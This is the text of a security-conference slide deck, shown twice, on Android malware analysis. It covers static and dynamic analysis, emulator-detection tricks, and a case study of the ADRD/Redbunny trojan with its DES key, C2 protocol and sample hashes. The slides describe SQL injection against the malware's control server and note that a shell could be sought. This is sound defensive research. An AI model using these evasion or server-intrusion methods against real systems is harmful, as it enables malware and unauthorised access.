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WTF is happening inside my Android

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8:30 PM


           Android System

           Static Analysis

           Dynamic Analysis


           Red Bunny


8:30 PM

Android architecture
8:30 PM

                    DALVIK VM

        - Register-based virtual machine

  - It uses its own bytecode, not Java bytecode.

      - Run on a slow CPU with little RAM.

- Run on an operating system without swap space.

       - Optimized for memory efficiency.

             - Dex class file format.
8:30 PM

Dex file format






8:30 PM

        Analysis Environment


Case-sensitive file system :D

Android SDK

Android NDK

Android source code


Apktool, Dex2jar, JD-GUI

Android Emulator
8:30 PM



8:30 PM



- Easy: Use a.class and A.class as class names: the file will
be hidden on case-insensitive file systems.
- Medium: Optimize/ofuscate the code with ProGuard.
- Hard: Modify bytecode to break reversing tools (be
sure that it still runs on Dalvik.)
                                         if self.__value_type >= VALUE_SHORT
Ej: androguard-a1:                       ...
                                         elif self.__value_type == VALUE_ARRAY :
                                         elif self.__value_type == VALUE_BYTE :
Insert value type                        ...
VALUE_ANNOTATION                         elif self.__value_type == VALUE_NULL :
                                         elif self.__value_type == VALUE_BOOLEAN :
                                         else :
8:30 PM

                            Dynamic Analysis


- Create an Android Virtual Device. -> $android (SDK)

- $emulator -port 5560 @virtual-device -tcpdump capture.pcap

- $adb install app.apk

- $adb shell monkey -v -p 700

- $adb shell logcat -d && $adb shell logcat -b events -d (radio also)

- $adb shell '/data/busybox find / -type f -exec /data/busybox md5sum
8:30 PM

                           Make it more real

- Simulate phone events:

Send SMS:

echo sms send +34656566789 test | nc localhost 5554
D/AT    ( 32): AT< 00200b914356566687f900001120720274404004e3f0380c

Simulate calls:

$echo gsm call +34656566789 |nc localhost 5554
$echo gsm accept +34656566789 |nc localhost 5554
$echo gsm cancel +34656566789 |nc localhost 5554

Change GPS coordinates:

$echo geo fix -82.411629 28.054553|nc localhost 5554
8:30 PM

                           Dynamic Analysis


- Create you own system image and modify the java classes to log the
program flow. Example, framework/base/core/java/android/os/
8:30 PM

                 Compiling Android Kernel modules

$git clone git://

$git branch -a

$git checkout --track -b android-goldfish-2.6.29 origin/android-

$adb pull /proc/config.gz ./;gunzip config.gz; mv config .config

Edit and Add CONFIG_MODULES=y (disable by default on
emulator kernel)

$emulator -avd armv5y -kernel /tmp/zImage
8:30 PM

System-Call Hooking

          $grep sys_call_table
8:30 PM


- Detecting the emulator is very easy:


String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID);
boolean emulator = TextUtils.isEmpty(id);


Change secure->android_id on data/data/


TelephonyManager manager = (TelephonyManager)getSystemService(TELEPHONY_SERVICE);
String imsi = manager.getSubscriberId(); (00000... on emulator)


Patch the emulator binary (search for +CGSN string) or the emulator source code (external/
8:30 PM

                               More Anti-VM

- LocationManager.NETWORK_PROVIDER -> IllegalArgumentException

- Detect ADB stuff.. process, network, debug enabled...

- /proc/cpuinfo - > Hardware
 : Goldfish

- vibrator.vibrate(milliseconds) and use SensorListener (sensor data doesn’t
(Thanks Ehooo)

- Qemu specific detection (Google)


Patch emulator, Qemu, system hooking...
8:30 PM

            Alternatives to Android Emulator

- . Supports VMware

- Use a real phone... Slower
8:30 PM

                        Attack Vectors

- Alternative markets, repacked applications.

-SMS, MMS vulnerabilities, Fuzzing!!!.

- Wireless, Bluetooth Drivers


- System componentes: Webkit,
sound library, Kernel.
8:30 PM

                  Third party software

8:30 PM

                             ADRD aka Redbunny

- "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in
the Wild by Aegislab" (
op=ViewArticle&articleId=75&blogId=1 )                          !

- "[…] Today, we found a new Android trojan,
we call it "ADRD", which was not reported by any security vendors before.

- Jaime Blasco and Pablo Rincón were working together,
analyzing this malware on Feb 2, 2011:

* Name: com.beautyfullivewallpaper
* Date: Feb. 2, 2011, 1:49 p.m.

- Also known as HongTouTou
8:30 PM


- Permission list:

- Cipher module/library calls (DES):
 * init        Ljavax/crypto/Cipher;    Lcom/xxx/yyy/ddda;    decrypt

- Function calls to retrieve the IMSI/IMEI codes:
 * IMEI:    getDeviceId       Lcom/xxx/yyy/MyService;    onCreate
 * IMSI:    getSubscriberId     Lcom/xxx/yyy/MyService;    onCreate

- HTTP Requests (GET and POST):
 * String str8 = "" +

POST    /index.aspx?
8:30 PM


- Sends http requests through a proxy:
 * HttpHost localHttpHost = new HttpHost("", 80, "http");
 * HttpParams localHttpParams =
proxy", localHttpHost);

- Services:
 * .beauty.Beauty
- Intents:
 * android.intent.action.BOOT_COMPLETED **** -> Boots at system startup
 * android.intent.action.PHONE_STATE
8:30 PM

                                               Analysis I

  Service module (MyService):                         Sets a Proxy for GET/POST and
- Sets the preferred apn      1                       HTTP specially crafted headers
- Runs each 12 hours                                  (UA, MIME types)
- Looks for specific APN network :                                                      2
                                         Cipher data module
Send data to            public static String encrypt/decrypt
index.aspx?im=%s:                        Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
+ Netway (preferred APN)
                                                                            + Decrypt response
+ iversion
                                                                            + Switch(cmd) It depends on the
+ oversion                   4
                                                                           + 0 Do nothing
                                                                           + 1 adad.StartGo()
 adad.StartGo()                                                            + 2 ParseO                      5
Sends                                 + 3 UpdateHelper()
Parses the big list of ulrs/referers
B#1#963a_w1|                                      UpdateHelper installs the update
g.ashx?w=963a_w1                                                         apk                              6
BBBB.Go() -> Retrieves search lists of
FixUrls(): Send random requests adding
BAIDU_WISE_UID and HTTP_HEADERS.                 ParseO(): parse server response (number, flags, tags..):
 Sends log data to control servers         6     T213607170863|12345|+    -10086+    abc   -597|   [   '
8:30 PM

                                         Analysis II

   - Following the encryption routines, the DES key is found…: this.kk = "48734154";

* UpdateHelper class:
  public class UpdateHelper
    private static String savefilepath = "/myupdate.apk";
    private Context ct;
    private int netway;

* Benefit from visits to the content (Baidu) and bandwidth consumption (China Mobile &&
Unicom) and also SMS charges.

- Server URLs (there are more):

- We want to know more!!
8:30 PM

                                     Control Servers

- from an eagle view:

* Microsoft-IIS/6.0

* Debug Enabled (Displaying .NET errors and backtraces)

* Hidden paths to the .Net/aspx application

* ALL is Chinese! (WTF!?!"·$%&/(?)

- Possible vector attacks:

* HTTP functions + DES key + pyDes = "legal" HTTP Requests (at least for the adrd server)
8:30 PM

                                       Control Servers

   - First results:
* Exceptions in chinese. Google Translate is your friend

* Errors at .NET (it didn't generate any html list/table, or view to use for data displaying)

* We got a successful Sql injection after the last ciphered parameter :D).

* User without admin privileges.

* Permissions to run Backups + Shared Resources = Timeout

 * Other possibilities:
   + 1: Create a temporal db, with just one table each time, dump paginated rows and run
backups. Problem: Complex to do and complex to rebuild the original DB (Also the lang
didn't help)
   + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current
attacks were hidden by DES at the http logs, and it's not usual to log all the db queries for
performance reason.
8:30 PM

                                     Database Information

   - All the scheme obtained: list of Tables, Fields, types, stored procedures

- IMEI/IMSIs list (at least some of them), logs, keywords, Baidu accounts

- The main stored procedure affected by the sql injection retrieves the URL of myupdate.apk, that
points to !
 * Parameters:
  @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int

* Store procedure:
  --if (@netwap=2)
  select 'T-1|T11'
  --select 'T3'
  --select 'T213607170863|12345|+        -10086+     abc     -597|     [     '
 --select 'T013607170863'

* Looks that they were considering the netwap (based on the mobile operator) as a criteria to send
 * TX (where X seems to be a command type)
 * 13607170863 is a phone number located at Wuhan
8:30 PM

                                                       Database Scheme

     t_baiduHourPercent: autoid, mHour, mPercent                                   t_       : myear, mmonth, mday, mhour, total
t_baidukeyword: keyword, viewcount                                                 t_               : way, flag
t_baidukeywordflash: keyword
t_baiduOrtherKey: keyword, viewcount                                               t_   : keyword, flag
t_baidupwd: id, way, username, pwd                                                 t_   _wap: keyword, flag
t_baiduwayname: way, wayname
                                                                                   t_   _wap_back        : keyword, flag
t_keywordResult: id, keyword, link, head, flag
t_androidtemplog: id, imsi, way, result, createtime                                t_   _wap_back        : keyword, flag
t_keywordResult20100601: id, keyword, link, head, flag                              t_     : flag
t_keywordResult20101108: id, keyword, link, head, flag
                                                                                   t_       : keyword, createtime
t_baiduHourPercent20101012: autoid, mHour, mPercent
t_androidtemplog_backup: id, imsi, way, result, createtime                         t_       _wap: keyword, createtime
t_androidtemperrlog: id, compresslog, decompresslog, createtime                    t_       : keyword, createtime
t_androidtemplog_backup201101: id, imsi, way, result, createtime
                                                                                   t_       _wap: keyword, createtime
t_android           : id, imei, imsi, logs, ip, createtime, netway
t_android               :      ,         ,          ,    , createtime
t_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, userid
t_                  : way, maxClick, minClick, leaveTotalClick, leaveEffectClick
t_             _wap_20100323: keyword, createtime
t_             _wap_20100722          : keyword, createtime
8:30 PM


- It uses the main package of the ADRD family xxx.yyy.

- The update has other permissions: WRITE_SMS, READ_SMS,

- Looks like a google reader

- It adds a local sqlite DB (keyword storage).
  go_g1_sms: id, keyword, type, flag
  go_g2_sms: id, keyword, keyword2

- SMSObserver:
 * Replaces keywords on SMS’s.
 * Sends SMS!
8:30 PM


              Package name                                Md5                    Adrd Ver     IVer
com.beautyfullivewallpaper               4556a687a2845bf4dfac62c594938cf3    6

com.yodesoft.yohandcar                   6783cee889fa64df68af58a56ff6e362   adrd.zt.2       6               aa5216da617839e818d83d8185da42b0   adrd.zt.jtj.2   6

com.magicwach.rdefense                   839c37f3a2c8d31561d28f619a2a712e    6

com.tat.livewallpaper.dandelion          5192ad05597e7a148f642be43f6441f6    6

com.classicnerds.livewallpaper.HK        b72724d8fc0f633194dcc3bd28eec026    7

fishnoodle.night_city                     a01ba26a34e55f71873782348ff5e074   adrd.zt.dxm.6 7

com.appspot.swisscodemonkeys.steam       cdfca19bf212adf3292e4fe677fe46a6    7

kr.mobilesoft.yxplayer                   e3cc6c7af0d83fe322116254c01cf720    7

com.labgency.wallpapers.waves            7d764347a0b0c9d11160d7a7684bf02b   adrd.zt.dxm.8 7

com.laucass.andromax                     627f41c8f8e7ab007641c4a0c1d8ce1b    7

com.digitalchocolate.androidrollergapp   71c0a67daa544450d7c620a48cc059b0    7

proscio.wallpaper.shamroc                e09782d35d72a769dc7454adb6d8e2e9   7                               f2596f8f3c52381318f62d1ab161c284   ??              ??
8:30 PM


g   Geolocation
8:30 PM


g   Infections by operator
                                          +20K different IMSIs

                                            Other affected operators:

                                            Far EasT one
                                            Peoples Telephone Company
                                            Hutchison 3G
                                            PCCW Mobile Sunday
                                            Hong Kong Telecom
                                            Smart One Mobile
8:30 PM

       Thank You

   !     Questions?

       Ok          Cancel



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Wtf is happening_inside_my_android_phone_public

  • 1. ! Lost in translation WTF is happening inside my Android Phone Ok Cancel
  • 2. 8:30 PM Contents Contents Android System Static Analysis Dynamic Analysis Reversing Red Bunny Conclusion Cancel
  • 4. 8:30 PM DALVIK VM - Register-based virtual machine - It uses its own bytecode, not Java bytecode. - Run on a slow CPU with little RAM. - Run on an operating system without swap space. - Optimized for memory efficiency. - Dex class file format.
  • 5. 8:30 PM Dex file format header string_ids type_ids proto_ids field_ids method_ids class_defs data
  • 6. 8:30 PM Analysis Environment Tools Case-sensitive file system :D Android SDK Android NDK Android source code Eclipse Apktool, Dex2jar, JD-GUI Android Emulator
  • 7. 8:30 PM Example .java/jd-gui Compiler dex2jar .java/source .dex/dexdump .smali/baskmali baskmali
  • 8. 8:30 PM Anti-analysis Examples: - Easy: Use a.class and A.class as class names: the file will be hidden on case-insensitive file systems. - Medium: Optimize/ofuscate the code with ProGuard. - Hard: Modify bytecode to break reversing tools (be sure that it still runs on Dalvik.) if self.__value_type >= VALUE_SHORT Ej: androguard-a1: ... elif self.__value_type == VALUE_ARRAY : ... elif self.__value_type == VALUE_BYTE : Insert value type ... VALUE_ANNOTATION elif self.__value_type == VALUE_NULL : ... elif self.__value_type == VALUE_BOOLEAN : ... else : raise(“oops”)
  • 9. 8:30 PM Dynamic Analysis Basic: - Create an Android Virtual Device. -> $android (SDK) - $emulator -port 5560 @virtual-device -tcpdump capture.pcap - $adb install app.apk - $adb shell monkey -v -p 700 - $adb shell logcat -d && $adb shell logcat -b events -d (radio also) - $adb shell '/data/busybox find / -type f -exec /data/busybox md5sum
  • 10. 8:30 PM Make it more real - Simulate phone events: Send SMS: echo sms send +34656566789 test | nc localhost 5554 D/AT ( 32): AT< 00200b914356566687f900001120720274404004e3f0380c Simulate calls: $echo gsm call +34656566789 |nc localhost 5554 $echo gsm accept +34656566789 |nc localhost 5554 $echo gsm cancel +34656566789 |nc localhost 5554 Change GPS coordinates: $echo geo fix -82.411629 28.054553|nc localhost 5554
  • 11. 8:30 PM Dynamic Analysis Advance: - Create you own system image and modify the java classes to log the program flow. Example, framework/base/core/java/android/os/
  • 12. 8:30 PM Compiling Android Kernel modules $git clone git:// $git branch -a $git checkout --track -b android-goldfish-2.6.29 origin/android- goldfish-2.6.29 $adb pull /proc/config.gz ./;gunzip config.gz; mv config .config Edit and Add CONFIG_MODULES=y (disable by default on emulator kernel) $emulator -avd armv5y -kernel /tmp/zImage
  • 13. 8:30 PM System-Call Hooking $grep sys_call_table
  • 14. 8:30 PM Anti-VM - Detecting the emulator is very easy: DEVICE_ID: String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID); boolean emulator = TextUtils.isEmpty(id); Solution: Change secure->android_id on data/data/ IMSI: TelephonyManager manager = (TelephonyManager)getSystemService(TELEPHONY_SERVICE); String imsi = manager.getSubscriberId(); (00000... on emulator) Solution: Patch the emulator binary (search for +CGSN string) or the emulator source code (external/ qemu/telephony/android_modem.c).
  • 15. 8:30 PM More Anti-VM - LocationManager.NETWORK_PROVIDER -> IllegalArgumentException - Detect ADB stuff.. process, network, debug enabled... - /proc/cpuinfo - > Hardware : Goldfish - vibrator.vibrate(milliseconds) and use SensorListener (sensor data doesn’t change) (Thanks Ehooo) - Qemu specific detection (Google) Solution: Patch emulator, Qemu, system hooking...
  • 16. 8:30 PM Alternatives to Android Emulator - . Supports VMware - Use a real phone... Slower
  • 17. 8:30 PM Attack Vectors - Alternative markets, repacked applications. -SMS, MMS vulnerabilities, Fuzzing!!!. - Wireless, Bluetooth Drivers - NFC - System componentes: Webkit, sound library, Kernel.
  • 18. 8:30 PM Third party software Source:
  • 19. 8:30 PM ADRD aka Redbunny - "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in the Wild by Aegislab" ( op=ViewArticle&articleId=75&blogId=1 ) ! Notification - "[…] Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before. […]" - Jaime Blasco and Pablo Rincón were working together, analyzing this malware on Feb 2, 2011: * Name: com.beautyfullivewallpaper * Date: Feb. 2, 2011, 1:49 p.m. - Also known as HongTouTou
  • 20. 8:30 PM Detection - Permission list:  * INTERNET, WRITE_EXTERNAL_STORAGE, ACCESS_NETWORK_STATE, READ_PHONE_STATE, RECEIVE_BOOT_COMPLETED, MODIFY_PHONE_STATE, WRITE_APN_SETTINGS.. - Cipher module/library calls (DES):  * init        Ljavax/crypto/Cipher;    Lcom/xxx/yyy/ddda;    decrypt - Function calls to retrieve the IMSI/IMEI codes:  * IMEI:    getDeviceId       Lcom/xxx/yyy/MyService;    onCreate  * IMSI:    getSubscriberId     Lcom/xxx/yyy/MyService;    onCreate - HTTP Requests (GET and POST):  * String str8 = "" + (String)localObject;  *     POST    /index.aspx? im=82a68757db94a88dace3e401a5721b33af757f73d68485eab1244e5dace 3ed65910991f4dbd438af
  • 21. 8:30 PM Detection - Sends http requests through a proxy:  * HttpHost localHttpHost = new HttpHost("", 80, "http");  * HttpParams localHttpParams = localDefaultHttpClient.getParams().setParameter("http.route.default- proxy", localHttpHost); - Services:  *  * .beauty.Beauty - Intents:  * android.intent.action.BOOT_COMPLETED **** -> Boots at system startup  * android.intent.action.PHONE_STATE  *
  • 22. 8:30 PM Analysis I Service module (MyService): Sets a Proxy for GET/POST and - Sets the preferred apn 1 HTTP specially crafted headers - Runs each 12 hours (UA, MIME types) - Looks for specific APN network : 2 “CMWAP” || “UNIWAP” Cipher data module Send data to public static String encrypt/decrypt 3 index.aspx?im=%s: Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding"); + IMEI + IMSI Loop + Netway (preferred APN) + Decrypt response + iversion + Switch(cmd) It depends on the + oversion 4 + 0 Do nothing + 1 adad.StartGo() adad.StartGo() + 2 ParseO 5 Sends + 3 UpdateHelper() +encrypt(IMEI+IMSI Parses the big list of ulrs/referers B#1#963a_w1| UpdateHelper installs the update g.ashx?w=963a_w1 apk 6 BBBB.Go() -> Retrieves search lists of FixUrls(): Send random requests adding BAIDU_WISE_UID and HTTP_HEADERS. ParseO(): parse server response (number, flags, tags..): Sends log data to control servers 6 T213607170863|12345|+ -10086+ abc -597| [ ' 6
  • 23. 8:30 PM Analysis II - Following the encryption routines, the DES key is found…: this.kk = "48734154"; * UpdateHelper class: public class UpdateHelper { private static String savefilepath = "/myupdate.apk"; private Context ct; private int netway; * Benefit from visits to the content (Baidu) and bandwidth consumption (China Mobile && Unicom) and also SMS charges. - Server URLs (there are more): - We want to know more!!
  • 24. 8:30 PM Control Servers - from an eagle view: * Microsoft-IIS/6.0 * Debug Enabled (Displaying .NET errors and backtraces) * Hidden paths to the .Net/aspx application * ALL is Chinese! (WTF!?!"·$%&/(?) - Possible vector attacks: * HTTP functions + DES key + pyDes = "legal" HTTP Requests (at least for the adrd server)
  • 25. 8:30 PM Control Servers - First results: Search * Exceptions in chinese. Google Translate is your friend * Errors at .NET (it didn't generate any html list/table, or view to use for data displaying) * We got a successful Sql injection after the last ciphered parameter :D). * User without admin privileges. * Permissions to run Backups + Shared Resources = Timeout * Other possibilities: + 1: Create a temporal db, with just one table each time, dump paginated rows and run backups. Problem: Complex to do and complex to rebuild the original DB (Also the lang didn't help) + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current attacks were hidden by DES at the http logs, and it's not usual to log all the db queries for performance reason.
  • 26. 8:30 PM Database Information - All the scheme obtained: list of Tables, Fields, types, stored procedures - IMEI/IMSIs list (at least some of them), logs, keywords, Baidu accounts - The main stored procedure affected by the sql injection retrieves the URL of myupdate.apk, that points to ! * Parameters: @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int * Store procedure: --if (@netwap=2) select 'T-1|T11' --select 'T3' --select 'T213607170863|12345|+ -10086+ abc -597| [ ' --else --select 'T013607170863' * Looks that they were considering the netwap (based on the mobile operator) as a criteria to send commands * TX (where X seems to be a command type) * 13607170863 is a phone number located at Wuhan
  • 27. 8:30 PM Database Scheme t_baiduHourPercent: autoid, mHour, mPercent t_ : myear, mmonth, mday, mhour, total t_baidukeyword: keyword, viewcount t_ : way, flag t_baidukeywordflash: keyword t_baiduOrtherKey: keyword, viewcount t_ : keyword, flag t_baidupwd: id, way, username, pwd t_ _wap: keyword, flag t_baiduwayname: way, wayname t_ _wap_back : keyword, flag t_keywordResult: id, keyword, link, head, flag t_androidtemplog: id, imsi, way, result, createtime t_ _wap_back : keyword, flag t_keywordResult20100601: id, keyword, link, head, flag t_ : flag t_keywordResult20101108: id, keyword, link, head, flag t_ : keyword, createtime t_baiduHourPercent20101012: autoid, mHour, mPercent t_androidtemplog_backup: id, imsi, way, result, createtime t_ _wap: keyword, createtime t_androidtemperrlog: id, compresslog, decompresslog, createtime t_ : keyword, createtime t_androidtemplog_backup201101: id, imsi, way, result, createtime t_ _wap: keyword, createtime t_android : id, imei, imsi, logs, ip, createtime, netway t_android : , , , , createtime t_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, userid t_ : way, maxClick, minClick, leaveTotalClick, leaveEffectClick t_ _wap_20100323: keyword, createtime t_ _wap_20100722 : keyword, createtime
  • 28. 8:30 PM Myupdate.apk - It uses the main package of the ADRD family xxx.yyy. - The update has other permissions: WRITE_SMS, READ_SMS, RECEIVE_SMS, SEND_SMS.. - Looks like a google reader - It adds a local sqlite DB (keyword storage). go_g1_sms: id, keyword, type, flag go_g2_sms: id, keyword, keyword2 - SMSObserver: * Replaces keywords on SMS’s. * Sends SMS!
  • 29. 8:30 PM Samples Package name Md5 Adrd Ver IVer com.beautyfullivewallpaper 4556a687a2845bf4dfac62c594938cf3 6 com.yodesoft.yohandcar 6783cee889fa64df68af58a56ff6e362 adrd.zt.2 6 aa5216da617839e818d83d8185da42b0 adrd.zt.jtj.2 6 com.magicwach.rdefense 839c37f3a2c8d31561d28f619a2a712e 6 com.tat.livewallpaper.dandelion 5192ad05597e7a148f642be43f6441f6 6 com.classicnerds.livewallpaper.HK b72724d8fc0f633194dcc3bd28eec026 7 fishnoodle.night_city a01ba26a34e55f71873782348ff5e074 adrd.zt.dxm.6 7 com.appspot.swisscodemonkeys.steam cdfca19bf212adf3292e4fe677fe46a6 7 kr.mobilesoft.yxplayer e3cc6c7af0d83fe322116254c01cf720 7 com.labgency.wallpapers.waves 7d764347a0b0c9d11160d7a7684bf02b adrd.zt.dxm.8 7 com.laucass.andromax 627f41c8f8e7ab007641c4a0c1d8ce1b 7 com.digitalchocolate.androidrollergapp 71c0a67daa544450d7c620a48cc059b0 7 proscio.wallpaper.shamroc e09782d35d72a769dc7454adb6d8e2e9 7 f2596f8f3c52381318f62d1ab161c284 ?? ??
  • 30. 8:30 PM Infections g Geolocation
  • 31. 8:30 PM Infections g Infections by operator +20K different IMSIs Other affected operators: Far EasT one Peoples Telephone Company Hutchison 3G PCCW Mobile Sunday Hong Kong Telecom Smart One Mobile
  • 32. 8:30 PM Thank You ! Questions? Ok Cancel @jaimeblascob @PabloForThePPL